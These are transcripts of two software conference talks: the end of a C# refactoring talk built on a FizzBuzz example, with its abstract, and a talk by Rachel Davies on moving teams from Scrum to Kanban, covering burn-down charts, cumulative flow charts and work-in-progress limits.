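            return "Buzz";
        return number.ToString();
    }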
And this is what it looks like. The other thing about if statements that will get you every single time is this: what if you run into a case where the if statement is, I don't know, maybe 3,000 lines long? What do you do with that? So let me step all the way back to what it originally was, well, forward to the unrolled version. Let's say this piece of code is 3,000 lines long, and this other piece is another 3,000 lines long. What do I do? This example was easy because I could see the whole thing; there has to be a way to understand a block that size and make it into something that you can still refactor. My solution is not so popular. For those of you in C#: who among you here hates regions? With a passion? Okay. Well, today I'm going to teach you a useful purpose for regions that won't make you hate them with quite such a passion. The reason you should use regions in this case is that I can collapse an entire section into something that actually explains what it does, refactor everything around it, and then take the region out once I need to work on what's inside it. So if you run into cases where you've got two 3,000-line blocks, or something that's completely unmanageable if you just leave it as is, you need to be able to at least conceptually abstract away what it does without actually changing the code. Regions are the quickest, dirtiest way to do that without introducing any bugs at all, because as we all know, in C# regions do absolutely nothing except maybe annoy you a couple of times when you have some generated code. That being said, once you've refactored everything around the regions, that's when you can start chopping everything down into smaller bits. Okay, back to the if statements, and let's see what I did. Here we go. This is what I was talking about earlier, where we cleaned this up. The other thing I did was a slight little change: I took out this one line of code and extracted it into another method. It might seem silly, because it's just one line of code and it's not going to be used anywhere else, but there's a purpose to it, and you're going to see it in a second. The idea is that once you get to the point where you have multiple methods that each do a single task, you need to be able to group those methods together with regions that say what they actually do. In this case, I believe the region is for displaying the numbers. So what happened here is that I did an additional extraction, and the Run method basically represents the starting point of the program, but the principle is still the same. So if I just go over and collapse it, this gives you an idea of what the main program would look like if everything were already refactored. Now you might be looking at the region and asking: what are we going to do with that? And what we're going to do is extract it into another class. Okay, I'll move forward a little bit. Here we go. The first thing: everybody sees this particular thing right here, right? You see these little red marks on the side, right next to the scroll bar; it looks like somebody slit their wrist. That's basically ReSharper telling you that there's something wrong with this picture. (A quick sketch of the region trick follows; then I'll come back to those errors.)
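As an illustration of the region trick described above, hiding an unmanageable block behind a descriptive name, refactoring around it, and later turning the region names into method names, here is a hedged C# sketch. The Order type and the method are invented placeholders, not code from the talk.

    class Order { /* placeholder type for the example */ }

    class OrderProcessor
    {
        static void ProcessOrder(Order order)
        {
            #region Validate the order and its line items
            // ... imagine 3,000 lines here ...
            #endregion

            #region Calculate totals, discounts and taxes
            // ... imagine another 3,000 lines here ...
            #endregion
        }
    }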
And if I were to compile this, it would give me a compile error, which is perfectly fine because we're actually doing an incremental class extraction. The other thing you'll notice is that if you look at the runner class, which I've extracted everything into, the run method is still private static as if it were an original part of the actual main method. And the idea there is that I'm actually just taking everything, cutting it away, and then putting it into a separate class. Normally, I would have just cut it away and then fixed it so that it was delegating to a static method. But in this case, I just wanted to show you the incremental steps to give you an idea of what's going on here. So, all I did in this particular step is I just fixed it so that the actual build error will be fixed. Of course, if you wanted to make this a little bit more object-oriented, none of this that you see here is object-oriented. In fact, it's very, very procedural since we're all dealing with statics. The idea at this point is we want to do class extractions to a point where it's no longer static, it's actually an instance method that we delegate to. Okay. And again, what I'm doing is I'm doing more and more method extractions within the runner class. So, if you're starting to see a pattern here, all I'm doing is doing these recursive method extractions. That's it. I'm not asking you to look for particular smells. I'm just asking you to break this down into smaller, little manageable bits. At the same time, you also might notice that I've taken the run method and I've made it an instance method, which fixes the problem since now that we're not no longer dealing with statics, but at least on a cosmetic level. So what's happening, what we need to do next is make the whole class, basically we need to make the whole class an instance class with possibly its own state in more complicated examples. The other thing that you will run into when you are doing this kind of refactoring is when you start extracting bits out, resharper will start complaining about missing fields. There's certain properties that are no longer there because naturally it's referencing something that was in the original class that is no longer there. The nice thing about those little errors that we normally consider to be errors is the fact that it's actually a design tool. It's a design tool that tells us what needs to be moved at the same time we don't have to worry or second guess about what the design needs to be because it's pretty simple. You need to fix this. If you don't fix it, it's not going to compile. So in this case, I've made the run method an instance method, but let's see what the next step is going to be. So by now this should be getting very, very repetitive and it should be because what I'm actually doing is I'm grouping this into another region and when I group it into another region, I'm trying to describe what it does. The other thing that you have to keep in mind is that it might seem silly that I'm actually grouping it into one region because I only have one set of things that are actually being done. I mean, technically I could take the contents of everything in that region and just dump it and extract it into another class, but that's not always the case in production. You might have classes that do six or seven things at once. It might take you hours, I don't know, maybe even days to chop a class down into a long set of single task methods. 
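As an aside for readers of the transcript, here is a minimal sketch of the shape described above once the extraction is finished: Main only delegates to an instance of the extracted Runner class. The class and method names follow the talk; the bodies are simplified placeholders of my own.

    using System;

    class Program
    {
        static void Main()
        {
            new Runner().Run();
        }
    }

    class Runner
    {
        public void Run()
        {
            for (var i = 1; i <= 100; i++)
                Console.WriteLine(GetTextToPrint(i));
        }

        // Simplified placeholder; the guard-clause version from the earlier sketch goes here.
        private static string GetTextToPrint(int number)
        {
            return number.ToString();
        }
    }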
And even when you get to that point, you need to have a way to organize these methods in a logical fashion without running into analysis paralysis. And the simplest way to do it is to group these methods into these regions and do another extraction, which is what I'm doing again. Oh, lovely. Okay. So what I did here is I jumped a couple of steps, but essentially what I have done is extracted out the number printing portions of this class. The idea here is that we are going to recursively extract every single one of these methods out until both all the methods do one thing and all the classes follow the single responsibility principle. And when I say the single responsibility principle, I'm being very Nazi about it. I'm even going to say it's maybe just a single method or even two methods because this technique allows you just to keep extracting ad infinitum. There are trade-offs and we'll get into that in a second, but the idea here is that we're breaking it into manageable little bits so that when you come back to it later, you know exactly what to fix as well as you don't have to worry about the duplication because we're effectively removing all duplication. So to recap, all we're doing is method extractions. We're inverting if statements to make sure that we simplify it and flatten out the arrow code. And third, we keep doing these class extractions to the point where there is absolutely no duplication left. There's no duplicate sets of responsibilities. There might be cross-cutting concerns, but that's a different issue. But for the most part, it's going to be clean. And when you get to a point where it's clean, depending on whether or not you want to use an IOC container, it's going to look something like this. The classes all have essentially one method. It's simple. And the best part about this is I didn't have to think about any abstractions at all. In fact, I didn't even introduce any features that weren't already there. I didn't introduce any design patterns. I didn't even go as far as to say that you don't use design patterns unless it's inherently already in the code because it doesn't make sense to introduce any other complexity here. So this is as far as you will ever get without the IOC container. I've decomposed it to a level where the container itself, I've decomposed it to a level where it's still using concrete classes. There's still a whole lot of coupling because there's nothing really to abstract away the construction. Now, there's two ways that you could actually go with this particular piece of code. If you want to go traditional and go with no IOC container, then you basically have to wire up the constructors yourselves. So if I were to delegate everything to an interface, then what you would have to do with these interfaces is you'd have to provide a default constructor that would create the default implementations for those interfaces. Okay. Now, before I jump to the next thing, does anybody have any questions? Is this pretty clear? Because I realize a lot of this stuff is monotonous. It's not the most exciting topic. As much as possible, I try to do regions. Okay. So his question is, do I do regions top down or bottom up? Now, as much as possible, I do top down. The reason why I do top down is because if you were to do bottom up, you have to drill all the way down and try to break everything into these small little bits, which is basically the point of method extraction. So what we're trying to do with regions is two things. 
Number one, we're trying to group the code into something that we can understand. And the second thing is that we want to hide code so that we can understand what's going on around it. For example, if I have an if statement with those two 3,000-line blocks, it's safe to say that it's impossible for me to understand what's going on in those 3,000 lines of code, at least not unless I wrote it myself, and I would never write something that messy. So the idea there is that we want to hide those blocks, and once you've hidden them, you start working inward. The other thing about these regions is that you can actually extract them. An example would be: if I had a method that was 3,000 lines long with several if statements in it, and I collapsed it, I could put those sections into regions. And once you have them all in regions, guess what, you can take those region names and make them into method names. All of a sudden you've divided a problem that was 3,000 lines long into maybe two 1,500-line methods. So this whole process is all about divide and conquer. In fact, there's nothing special about it; I've actually just restricted the set of refactorings that you're allowed to use. And in this case it works out, because you don't have to think about what the model is going to look like, and at the same time I'm not telling you to introduce any abstractions that aren't already there. I'm actually just telling you to move the code from one class to the other, which is easy. And if I were to go further in this example, the only thing I'd actually be doing is extracting the interfaces out of the code, and once I've extracted the interfaces, I have a composition root that does all the nice things, like putting all the pieces back together again. And it works just as if I had never touched it in the first place. Any other questions? You know, I know Norwegians are really, really shy, so I have to ask again: does anybody have any questions at all? No one? Yeah, I have to admit that, yes, you do get more lines of code. But in this case it isn't about lines of code as much as it is about being able to manage and change the code. For example, if I go all the way to the last step, which is completely refactored: if I wanted to change the program so that it would do something else, I don't know, maybe print every third or fourth number or any other pattern, all I would have to do is look at the interfaces, come up with my own custom implementations of those two or three interfaces, and plug them in. And it would be pretty trivial to do so. If I had just stuck with the regular code, assuming it wasn't FizzBuzz and it was something horrendously big, then you couldn't do the same thing. So lines of code is not necessarily what we're after here. What we're after is being able to maintain the code and keep it in a clean state, so that if we want to change things, it's practically effortless. And in this case, it is. Any other questions? Yeah? Okay. How does TDD fit into this refactoring technique? So, TDD is the assumption for this particular technique.
I mean, I've tried doing this without tests before, but the problem is, let's face it, you have to have tests that back the behavior and verify that behavior, because if you change the code, there's no guarantee that it'll work the same way. I used to say that you could get away without tests using this method, but you can't. Ultimately, this is just one part of the TDD cycle, which is red, green, refactor. The assumption here is that you already have the tests in place; you just need to be able to refactor the code so that it's in a cleaner state. If you don't have tests for it, then the first thing you have to do is wrap tests around it, and then you can change it, because that's the only sane way to go about doing this. I can't recommend any other way than that. There's just no way to shortcut it. I'll take one more. Sweet. Okay. Thanks for coming, guys. Thank you. Thank you, guys.
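To close the loop for readers of the transcript, here is a rough sketch of the end state the speaker described: single-responsibility classes hidden behind interfaces and wired together in one composition root. I'm wiring by hand rather than committing to a particular IoC container (Hiro, Castle Windsor, StructureMap or Autofac would all work), and the interface names are my own invention, not the ones in the speaker's repository.

    using System;

    interface IFizzBuzzEvaluator { string Evaluate(int number); }
    interface INumberWriter { void Write(int number); }

    class FizzBuzzEvaluator : IFizzBuzzEvaluator
    {
        public string Evaluate(int number)
        {
            if (number % 15 == 0) return "FizzBuzz";
            if (number % 3 == 0) return "Fizz";
            if (number % 5 == 0) return "Buzz";
            return number.ToString();
        }
    }

    class ConsoleNumberWriter : INumberWriter
    {
        private readonly IFizzBuzzEvaluator _evaluator;
        public ConsoleNumberWriter(IFizzBuzzEvaluator evaluator) { _evaluator = evaluator; }
        public void Write(int number) { Console.WriteLine(_evaluator.Evaluate(number)); }
    }

    class Program
    {
        // The composition root: the only place that knows about concrete types.
        static void Main()
        {
            INumberWriter writer = new ConsoleNumberWriter(new FizzBuzzEvaluator());
            for (var i = 1; i <= 100; i++)
                writer.Write(i);
        }
    }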
|
Have you ever wondered if there was a better way to learn refactoring? Martin Fowler's Refactoring book was a great introductory book on how to clean up legacy code bases, but over the years, what I have found missing in that book is a set of guidelines that links all the different types of refactoring techniques together into one continuous process. In this talk, I will show you how to take almost any code base and refactor everything from the simplest nested 'if' blocks all the way to extracting an actual domain/object model and using an IOC container framework. Using a set of repeatable steps, I will show you how easy it is to refactor almost any code base, even if you don't understand every part of the application.
|
10.5446/50986 (DOI)
|
Hello everyone, my name is Rachel Davies and I'm going to be talking to you today about moving from Scrum to Kanban. This is actually the first time I've given this talk. I've given lots of different talks, and when I was talking to the organisers they said it would be good to have a presentation about Kanban, and I thought that what people are actually struggling with is the move: if we're already doing some form of agile, how do we get the best of both, or why would we want to change? A little bit of background about me: I started out as a software developer, but I have become a bit post-technical, so I haven't written any code for about the last five years. I worked in an XP team in 2000, doing test-driven development and pair programming, so the methodology that I know best in the agile sphere is really XP. Then I moved into becoming a coach. Lots of organisations want to get started with Scrum as an initial approach, so I've been working with Scrum teams probably for the last six years, and more and more of the teams I meet are looking at other ways of bringing lean ideas into the way that they work. Kanban is a particular approach that has started to be more widely adopted, and people are trying to work out: do we go that way or not, or do we have some kind of Scrumban mixture? I have also written a book about agile coaching; I don't think it's at the bookstore here, there's a different one about agile coaching. And please, I know that this is Norway and you may not feel like asking questions, but I do encourage you: if I'm talking about something and you have a question, or you think "I wish she would talk about this", raise your hand and let me know. So, in my experience, lots of teams in the industry are using Scrum, some people have heard about Kanban, and some teams are using Kanban, and this talk is really about how to evaluate whether it's a good thing for you to use, and also what you would need to do to get started. I'm actually going to start by talking about Scrum, because I think if you're moving for any reason, it's usually because something isn't working. So let's talk about the things in Scrum that might not work in the organisation that you're applying Scrum in. Just before we get started on that: who here is using Scrum in their organisation? Okay. Now, here's a very simple diagram; this is the kind of Mike Cohn-style diagram of what Scrum is. It's a framework for developing and sustaining complex products. The core part of it is that you have a backlog of feature requests, you work in sprints, you make a little sprint backlog for the sprint that you're working in, and every 30 days or less you're producing a product increment. And every day you're getting together as a team, because it's a team approach, to work out how we're going to get towards delivering that product increment. Now, sprints are really this time box, and this is the key difference between Scrum and Kanban: Scrum is a time-box-driven approach. This is how it should work, this is the ideal view: sprint, product increment, sprint, product increment. Each sprint is like a mini project in itself, producing something that could be valuable and used, going live, people using it and giving feedback. But it's not really what I see most of the time when people are actually implementing Scrum.
So the good thing about sprints is that you have a clear goal, and if you were in Esther's talk earlier on, one of the things that brings a team together is having a shared goal. When planning a sprint, we all get together as a team, we figure out our goal for this month or these two weeks, and then we work towards it. So we've got a reason to collaborate, and we're not being pulled off onto all sorts of other side projects. We're on this sprint, this is our goal, and we're not also doing this and this and this other thing. Now, the upside of that, from the outside, is that stakeholders know how to engage: they know when to expect things, there's a sort of rhythm to the development, there are regular meetings where people can see what's being developed, there should be demonstrations of the latest product increments at sprint reviews, and there's a cycle so people know when they need to get their features ready for consideration for the next sprint. So it's a good coordinating mechanism. Now, let's talk about some of the downsides of Scrum, and I'm going to ask you whether you've experienced any of these. One of the downsides of sprints is that, like any deadline, we have a date we have to do stuff by. We may have planned slightly optimistically, there were the unexpected things that went wrong, and so it often feels like crunch time at the end of the sprint, where we're rushing to get things done, things that maybe aren't done as properly as they should be. There's a little bit of a rush on testing, a little bit of compromise on design, and you often end up with things that didn't quite make it, things that didn't get finished or even didn't get started. Another thing is that this idea of having a time box creates a sort of strange way of packaging up items, because the items are packaged up as bundles that fit in a time period, rather than sensible bundles of features that you might actually want to consume and use. So you partly end up with this pattern of: we've made a product increment, but it's not really what we want to go live with yet, so let's make another one, and let's make another one. Now, I don't know who here has come across the term Scrummerfall? Anyone? There's a guy called Brad Wilson, and I think he describes it as the combination of Scrum and waterfall to kind of the worst effect. You can see what I mean, but it is very common in large organisations, especially those working on large products, and you might actually have parallel teams working on this, that you have a bit of a requirements phase and then the sprints are really seen as the development phase, with a bit of testing thrown in. So you're doing your sprints, you produce a product increment, you put it on the shelf, and then you produce another one and another one, and nobody's really that interested in the product increment you made, because it's not really going to go anywhere. It's going to be stacked up, and in six months' time we're going to release something. So then it means that sometimes the testing isn't fully resourced and we don't get round to doing all of the testing until maybe the fifth and sixth month, and maybe we don't have all the people on board the project, and maybe, as we're getting towards that end point, some of the people involved in the requirements are no longer involved; they're looking at phase two. So you get some of the classic things you would get with waterfall, but you are really getting some improvements through having good coordination within the team.
So the team is more focused but the general product or product development is still a big lump of software that's being built. So I don't know, I'm going to ask for a show of hands, has anyone seen this kind of situation? A few people. The thing is it's not wrong and I'm not here to judge or say this is wrong, it's just that some of the practices make less sense. Naturally the stakeholders just feel like, well, I could go to the demo, but on the other hand that's not really what's going to be released. So maybe I'm too busy right now, I'll go next time, and then maybe they go to the last one and then they're going, that's not what we wanted. So you can get this kind of Scrum-waterfall situation. There are some other things which are in Scrum which I think teams find challenging. So one of them is burn-down charts. So who here uses burn-down charts in their teams? This is often a source of confusion and mystery. Burn-down charts are supposed to make it easy for people to see what's going on, but just purely having a slopey line that's the ideal line and a sort of line that is where we're at at the moment often doesn't communicate that to people. It's not enough information because it doesn't really say where the work is. Either things are finished or they're not finished, but you can't really tell within the team what the state of them is. So here are a couple of pictures of burn-down charts. They're just random pictures that I happen to have on my laptop, and what you'll find is that they don't look the same for a start, and you can work in organisations where different teams are using different burn-down templates, and from a stakeholder point of view that's quite confusing. This bar version has things that were added after planning and things that were removed after planning. Now if you know about Scrum you know that you're not really supposed to do that, but it seems like this team is kind of doing it. They've adapted their burn-down chart to kind of show, well, this is why we're running late, because we have to do other stuff instead. So we're not really even using that sprint as a protected capsule around the development. There's another one I found on my laptop which I'd named the crazy burn-down chart, and it's because it is crazy. It doesn't actually help you know what's going on. What does it tell you? It tells you somebody had too much time on their hands to do tracking, I think, and I don't think it really helps to see where the work is. And so one of the techniques you can use in Kanban is this cumulative flow chart stuff, which I'm going to come on to, and that's sometimes a way to get a clearer view of what's going on. Now the other thing that is a bit of a mystical thing within Scrum is product backlog grooming. Now product backlog grooming is really the art of going through the near-term items on the product backlog and trying to understand what they are and get them clear. It's not really requirements analysis. It's much more trying to figure out what should be in there, what is valuable, what's the next thing we should really be working on. But people find that it's somehow invisible work. The team is having daily Scrum meetings and they're focusing on what we need to do today, and the product backlog work kind of always takes second place.
So you end up in this situation where people kind of get towards the end of the sprint and they're going, ah, we'd better get some stuff ready for the next sprint otherwise our planning meeting is going to take ages. So this is, but it isn't visible work typically. If you look at the burn-down chart, that doesn't really tell you where you're at with your product backlog grooming. And Kanban can help you with that. So there is one other thing that I wanted to mention, and I didn't put a slide on it just because I thought it's contentious, which is estimating. So one of the things that I see in Scrum teams very often is a lot of confusion about what units we're estimating in, complexity points, ideal days, what does a point really mean? You know, people are always constantly thinking, right, when we say one point we really mean half a day or three hours, and then there's a lot of discussion. There's a lot of time that the team puts in to try and estimate their product backlog, to try to get these magical numbers. And yet are those numbers that useful as an aid to predicting things? And when you do Kanban, one of the things that I think attracts people to Kanban is they think, great, now we don't have to estimate everything. And that's not necessarily true. You may still want to do estimation and you may still need to do product backlog grooming, those kinds of activities. But there is an illusion that people move to Kanban because they think they will get rid of planning meetings. And I don't think that's the case. So, let me talk about Kanban now. Now, I also want to know who here is using Kanban. Is anybody already using Kanban? Few people. Cool. And I should say, I'm not pro Kanban or pro Scrum, I'm kind of pro sensible things to do that work for the team. So, I'm trying to really say what's in Kanban that you might be able to use for your organization. So, Kanban is really the Japanese word for visual signal card or something like that. I don't speak Japanese, so I may be entirely wrong. But to me, it's all about visualizing the work and using visualization as a way of triggering what we need to do next. So, you need to take some care in thinking about how we visualize it to make it something that people will respond to. Now, there are a whole bunch of books that have been written about Kanban for software development. One of the main proponents of Kanban is David Anderson, and he's written this book, Kanban: Successful Evolutionary Change for Your Technology Business is his title. There are other books. There's a book about Scrumban. There's also a book which Henrik Kniberg has written. I think there are a bunch of different books, there are a bunch of different papers. People have been really trying this approach out. But I would say it hasn't really settled into, this is what we all agree Kanban is, in just the same way as there's still debate within the Scrum community about what's the correct unit to use or the right way to draw a burn-down chart. So, you will get conflicting opinions within the Kanban arena, I guess. Now, what this does is it really uses two techniques that are really from the lean product development environment, I guess. One of them is making things visual. And the other thing is trying to focus on flow by limiting work in progress. So working on fewer things, having shorter lists of stuff, having less inventory in the process.
So a key thing about visualizing is if we can start to really clearly see what the flow is, we can start to get the rocks out of the way to improve the flow. If it's too difficult to see what steps things go through, then it's harder to really look at optimizing the end-to-end flow, and people tend to do something called local optimization. They tend to kind of say, well, let's just get the bit of flow between you and me working rather than let's look at the end-to-end flow. And for people it's very difficult to let go of what is the most efficient for me versus what is most effective as a throughput for the system. So it's something that feels counterintuitive because everybody feels they should just be busy all the time. But at the same time, if you're busy, then you may be working too far ahead on stuff that you may not need. And actually your attention might be better placed into improving the system. So one technique that you use within Kanban is to just start making the queues of work visible. So you're starting to make the inventory of work in the system easier to see. So this is just a picture of wait times at a Disney park. And because it's displayed, it allows people to make a choice. So what you're really trying to do is not just make the system's queues visible to the people working in the system, but also to the people who are making choices, so that people understand what the typical wait time to get something is. If I'm asking for a feature and I don't really understand how long it takes between something going on the product backlog and something actually coming out and being released, which can actually be weeks and weeks in some organizations, then I will not be making well-informed decisions. So it's trying to make information available to help people make better decisions. And what you're doing here, it doesn't say how many people are in the queue, it's just telling you how long you will have to wait before you get something. And what you typically do in Kanban systems is you move much more towards cycle times. What's the date we started working on something and the date we finished working on something, rather than thinking about points or how points map to time, those kinds of things. You're looking at cycle times. Now here is a picture just from a Scrum team. And this is their initial steps towards Kanban. So they are starting to make the work visible. Now I don't know if... Can you make any inferences from this board? Anything that you would... observations you would have about it? Can you see what's going on? Easily. It's a bit messy for a start. And actually if you're going to get into making things visual, you have to take care that things are easy to read, that it is clearly set up, that column headings are clear to understand. For example, this board has a kind of a blocked area, kind of towards the top here. But it's not really clear what's in the blocked area, where the blocked area ends or how things get in there or how they get out of there. And if you took a closer look at these tickets, they kind of started with good intentions. They thought, well, we'll use something to print out the tickets in our defect tracking system, because that's what they're using for their planning software. But the thing is that the program that they're using, the main thing it prints in big, big letters, or rather numbers, is the reference number.
So if you look closely at this, all the big bold text is some long reference number. So in the stand-up meeting, people are saying, well, I'm working on issue number one, two, three, five, six. And that's not an easy thing to communicate. The other thing that may not be clear from this board is there's two teams. They're both writing software to run on internet-enabled TVs for the Olympics. And the team at the bottom is using a particular browser. The team at the top is trying to do an HTML version. But actually what you'll see is there's a blank area in the top team. And that's because that area is ready for test. What they're doing is they're working in one-week sprints. And then at the end, they kind of go, put everything over ready for test. And then nothing gets tested in that one week's sprint. And everything carries over to the next. And so sprints are being used to build stuff but not build and test. So there's no meaningful product increment. And actually also then, the kind of demo that they have isn't a normal sprint review. It's kind of a management walk-around where people show things working on the TVs in their area. So again, there's no real accountability to this is what's working and tested. It's more like, you know, here's some stuff. Look how cool it is. And so it's not an integrated team in terms of the development and the testing. So you need to do a little bit more than just make the work visible. You start needing to just try and sort of focus on, let's not have too many things going on at once. So Kanban is used in the Toyota production system. This is really going back to lean manufacturing, lean production. And if you go to a Toyota factory and look at the production line, Kanban cards are also used in multiple ways to control the flow. So each order for a car has a Kanban card that goes with it, that goes through the production line with it. Also, the stock around the different cells on the production line has its own system of cards, so that you don't have, you know, 100 wheels, you just have a stack of 20. And then as that gets used, you pull in another 20. So they keep the supply chain, the supply levels, low so they're not building up batches of stuff. So they don't on Monday make a batch of red cars and on Tuesday make a batch of black cars. They have to change their paint system so that they can make a red car, followed by a black car, followed by a white car. And that's really improved the flow. So they're using Kanban to be the ticket for the order and they're focusing on how can we improve the flow per order through the system. Now this is, I guess, a little bit of a sketch of something that's really a bit like the team we were looking at before. They've got some stuff that they're about to work on, there's the stuff that they are working on, but they don't really have anything ready for release because they're really thinking our real release is to make something available for the Olympics. And these mini one-week-sprint product increments, well, they're not going anywhere so we don't really care about them that much. So one of the things to do is to start focusing on releasing stuff. So to have fewer things in the pipeline and actually get that all the way released. And when you start limiting the work in process, you're perhaps doing less product backlog grooming now and you're now focusing on what's the next thing to release and what's stopping us from doing that.
Now as well as having boards that visualise this flow, you can also use a technique called cumulative flow charts. So I don't know, is there anybody here using cumulative flow charts to represent their board information? Maybe I should also ask, is anybody using a board that looks like that board I showed you, with columns and cards on it? A few people. Now who is not using a physical board but they're using an electronic board? Now there's absolutely nothing wrong with using an electronic board. The same principles apply, it's just easier and more tangible to explain it with the physical cards. And I think when you have the limits of a physical board with physical cards on it, you start to realise that you've got too much work in progress more quickly. When you're using an electronic system, it's often easier to keep adding and adding and adding rows and tickets, and then it starts to be a lot of things that you're discussing when you have your daily Scrum meeting. So cumulative flow charts, I think I see them really as being a more useful version of a burn-down chart, because what you're trying to do is make not just the general trend line visible but actually the view of how many items are in each of the columns of your board. So I'm just going to go through a few examples. So here's a very simple one and I've just tried to keep this simple so that you can get the basic principles. So you'll notice that the vertical axis is not points, it's not ideal days, it's number of things. So it's just the number of items in any one state, which makes it quite easy to create, because you just look at the board and go one, two, three, five, okay, and then on the next one, and you usually do this in a spreadsheet. I haven't been using planning software to generate these, I've been using spreadsheets. This is a very simple process, it only has three states. So there's some work that's on the product backlog that we haven't started, there's the work we're actually doing and there's the work that we've released, and what you'll see is that the green stuff is gradually increasing at a steady rate, and you can look to see how many items are in process at any time, and you can look across ways to see roughly how long it typically takes, and you'd start to look at what average cycle times are for things. It does assume that items are roughly similar sized, and if you've got odd-shaped items your flow will be a bit more ragged. Now if you're doing Scrum then what you'd see is really this kind of slightly stop-start pattern, you know, you release some stuff, you do another sprint, some more stuff released, you do another sprint, and if you use Kanban you're not using sprints, so Kanban doesn't have the idea of wait until the end of a time box, you really are releasing as you go. So as soon as something is finished you release it, then the next thing, you release it. So it works very well with a continuous deployment setup. Now just to illustrate what Scrummerfall would be like if you used a cumulative flow chart, you'd probably have a lot of different states, and notice that many weeks go by before you actually have anything ready to release. So you're not generating the value, there's a long cycle time there before you get your value.
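To make the spreadsheet exercise described above a little more concrete, here is a rough sketch of how you might tally daily board snapshots into the stacked bands of a cumulative flow chart. This is purely illustrative JavaScript; the column names, dates and counts are invented for the example and are not from the talk.

```javascript
// Illustrative only: turning daily "how many cards sit in each column" counts
// into the stacked bands of a cumulative flow chart. All numbers are made up.
const snapshots = [
  { date: '2012-06-01', backlog: 12, doing: 3, released: 0 },
  { date: '2012-06-02', backlog: 11, doing: 4, released: 1 },
  { date: '2012-06-03', backlog: 10, doing: 4, released: 3 },
  { date: '2012-06-04', backlog:  9, doing: 3, released: 5 }
];

// Each band is the running total of items that have reached that state or
// beyond, so stack the columns from "released" outwards.
const cfdRows = snapshots.map(day => ({
  date: day.date,
  released: day.released,                        // bottom band
  inProcessOrDone: day.released + day.doing,     // middle band
  total: day.released + day.doing + day.backlog  // top band: everything on the board
}));

// The vertical gap between bands is how many items sit in that state; the
// horizontal gap between bands gives a rough feel for average cycle time.
cfdRows.forEach(row => console.log(row));
```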
Now what these charts can help you see, and what the boards can help you see, are bottlenecks in your process, and a bottleneck, the definition from The Goal, is any resource, so that's a person or a thing or a machine, whose capacity is less than the demand placed on it. Now it could be we've got six developers and one tester, that tester then becomes the bottleneck. Now if we added six testers the bottleneck would normally move somewhere else, it's normal in a system to have some bottlenecks, and typically what people do to cope with bottlenecks is they create some buffers in their system. So if you know that you have a bottleneck, what you don't want to do is have a situation where that person is waiting around not doing anything. So you just think about the classic thing you might do in Scrum where the development team is busy developing stuff and they haven't made anything available to test, and then they say, oh right, the last day of the sprint, here's everything to test, and that person really can't then cope. You want to level the workload and have some buffers so they've got some stuff ready to test that they can pull through the system. So what you start doing when you're using Kanban is you first of all have some basic columns, and then as you start to understand your workflow better you start introducing some buffers to try and smooth out the flow so you get a better throughput. Now yes. Yes, yes, yes, I'm coming to that. So I'm not yet talking about how you start doing it. I'm just trying to explain roughly what Kanban is and then what steps you would take. So yes, I agree with you. Yes. Any other questions just before I move on? Yes. Yes. Yes. Yes. Yes. So that's an interesting thing, is that Kanban is a technique from a production line. Knowledge work isn't a production line. You're creating unique things every time, and actually in software development the items are very much different sized. You can get something very, very small like change some text on a page, or, you know, great, build this new component, or, you know, improve the performance and reliability of the system. They're kind of different-sized items, and so one of the challenges really is that Kanban works best for similar-sized items. So typically what teams might do is have columns where you're trying to break those down. So visualizing that product backlog grooming activity so that you're breaking things down into similar-sized features, so that then you can start to use this kind of flow-based approach. Yes. Yes. I think that's actually a challenge for Kanban. So for instance, non-functional requirements or quality attributes, they are things that you have to be checking all the time, rather than, you can't say, oh well, we've done the architecture, because you keep changing it. So to some extent, you know, you can't say sprint one, we've delivered performance, because you're going to have to keep checking that it's keeping to a level of performance. So I agree. But I think that's an issue with both Scrum and Kanban. You have to figure out a way to do that, and being clear about the measures that you have and the way that you're going to inspect for those measures is part of the answer. So I'm going to move on a little bit now. So these cumulative flow charts, I showed you some kind of ideal ones which are a little bit smoother. Typically what you start to see is that these bands start to expand where there's somebody who's blocked and waiting.
And so what people start doing in a Kanban system is they introduce these WIP limits. WIP is short for work in progress. And so what you're trying to do is impose a limit on how many things can be in a particular state. The way you operate those limits is that, supposing you are a developer and you see that there are three things that are already in development, if one of them gets blocked, you can't start another one. You have to try and figure out how to unblock the thing that is blocked, or go and help somebody else where there is a downstream activity that needs to flow through. So I've got some text to write that out because I think sometimes that gets confusing. So how do we operate WIP limits? This is some text from David Joyce who's been running some Kanban teams at the BBC. So the limit governs the maximum number of work items that can be in any state at any instant. And if I haven't reached the limit, I can pull more work in. I can start doing some more stuff. But if I've hit my limit, then I can't start working on some more stuff, and I actually have to either wait, focus on process improvement stuff, or try to help unblock the system. And that really relies on team communication. And it isn't helpful if everybody tries to help too much, if you see what I mean. So you probably want to, in your team, kind of go, oh, we're blocked on this, right? So maybe you and you, we're going to work to try and unblock it. And you and you, let's try and do some look-ahead work and perhaps not focus on making more stuff. What we're doing instead is we're thinking about how we can improve things, maybe looking at tools, ways of, you know, improving the way that we work. Now, this is kind of a very ideal picture. But really, this is where you've got quite narrow work-in-progress limits. And what you'll see is that the flow of items is happening so that you're getting things out of the system very soon. So almost as soon as you finish something, it's going live, as soon as you finish the next thing, and you're just focusing really on keeping that cycle as short as you can. Now, I'm going to flip into talking about how you might get started with Kanban. So the very first thing I think is you start with a technique which is called value stream mapping. Now, to formally do value stream mapping, as in the kind of leading textbooks, you really try to follow the work and use examples and look at how long specific pieces of work actually take, where they wait around. So if you imagine, you might write a requirements document, and then it might be waiting to be signed off, and you might have to wait for the steering committee to get together and then wait for a team to be formed, and there could be all of these different steps. Now, it's helpful to do these practical examples where you actually follow a piece of work and look at how long it really takes to get through, but often in terms of setting up a board for a team to use, you may be better off to start by just sketching out what we think our workflow is, and so what happens in this picture? There is a little stick person, and he's starting to create a book of work. So he's working in a bank, and he gets traders asking him for stuff, and sometimes he says to the traders, no, and other times he says, oh yeah, that sounds like a good idea, yeah, let's put that in our book of work, and so that's your first queue of work starting to form.
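As a minimal sketch of the pull rule David Joyce describes above, the logic a team is informally applying at the board looks something like this; the column names, limits and ticket names are made up purely for illustration and are not from the talk.

```javascript
// Toy model of operating WIP limits at the board; everything here is invented
// for illustration, it is not a real Kanban tool.
const board = {
  analysis:    { limit: 2, items: ['trade-report'] },
  development: { limit: 3, items: ['fx-feed', 'limits-check', 'audit-log'] },
  test:        { limit: 2, items: ['settlement-fix'] }
};

// The pull rule: you may only pull new work into a column while it is under
// its WIP limit; otherwise go and help unblock downstream work instead.
function canPull(columnName) {
  const column = board[columnName];
  return column.items.length < column.limit;
}

if (canPull('development')) {
  board.development.items.push('next-ticket'); // start the next item
} else {
  console.log('Development is at its WIP limit - swarm on blocked or downstream work');
}
```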
